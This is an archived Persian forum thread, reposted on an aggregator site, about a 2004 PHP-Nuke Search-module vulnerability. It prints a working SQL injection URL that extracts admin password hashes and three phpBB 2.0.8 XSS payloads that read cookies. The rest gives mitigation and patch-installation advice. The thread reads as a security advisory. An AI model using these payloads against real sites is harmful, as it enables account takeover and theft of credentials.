تبلیغات
تبلیغات متنی
محبوبترینها
ماندگاری بیشتر محصولات باغ شما با این روش ساده!
بارشهای سیلآسا در راه است! آیا خانه شما آماده است؟
بارشهای سیلآسا در راه است! آیا خانه شما آماده است؟
قیمت انواع دستگاه تصفیه آب خانگی در ایران
نمایش جنگ دینامیت شو در تهران [از بیوگرافی میلاد صالح پور تا خرید بلیط]
9 روش جرم گیری ماشین لباسشویی سامسونگ برای از بین بردن بوی بد
ساندویچ پانل: بهترین گزینه برای ساخت و ساز سریع
خرید بیمه، استعلام و مقایسه انواع بیمه درمان ✅?
پروازهای مشهد به دبی چه زمانی ارزان میشوند؟
تجربه غذاهای فرانسوی در قلب پاریس بهترین رستورانها و کافهها
دلایل زنگ زدن فلزات و روش های جلوگیری از آن
صفحه اول
آرشیو مطالب
ورود/عضویت
هواشناسی
قیمت طلا سکه و ارز
قیمت خودرو
مطالب در سایت شما
تبادل لینک
ارتباط با ما
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
مطالب سایت سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون
آمار وبسایت
تعداد کل بازدیدها :
1836955634
جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين -
واضح آرشیو وب فارسی:سایت ریسک: t=14428">جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين amirfigo_62 27 تير 1383, 18:10جديترين باگ در PHPNUKE نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3 درجه : critical نويسنده : Janek Vind در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD 5 مدير سايت را به نفوذگر ميدهد كد اكسپلويت : modules.php?name=Search&type=comments& query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors مثال : exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد دريافت سيستم امنيتي مشهدتيم : بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از: ;//localhost/phpbb 208/faq.php? faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/faq.php?mode=bbcode& faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/index.php?category_rows[0][cat_id]=1 &category_rows[0][cat_title]=amir<script>alert(document.cookie);</script> &category_rows[0][cat_order]=99 ------------------ عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد Ashioone007 28 تير 1383, 13:37من patch مشهد تيم رو دريافت كردم ولي نمي تونم در كپوم قسمت بايد آپلود كنم ممنون مي شم منو راهنمايي كنيد amirfigo_62 28 تير 1383, 15:04سلام patch رو از ادرس : دريافت كنيد يك سري پوشه مثل modules - includes داره كه خوب بايد فايلاش جايگزين قبليا بشه فايل هايي هم كه در شاخه اصلي بايد باشه مثل mainfile.php - index.php هم به همين صورت وقتي دارين فايلا رو اپلود ميكنيد كافيه موقعي كه از شما سوال ميشه ميخواين فايل ها over right بشه شما yes to all رو بزنيد تا بصورت كامل patch نصب بشه مثلا اگه فايل class_sql_inject.php رو از پوشه includes اپلود نكنيد سايت شما پيغام خطا ميده چون در mainfile.php تعريف شده كه اول اين فايل فراخواني بشه تا تست كنه ادرسي كه درخواست شده معتبر هست و از كدهاي غير مجاز توش استفاده ميشه يا نه موفق باشيد امير
این صفحه را در گوگل محبوب کنید
[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 862]
-
گوناگون
پربازدیدترینها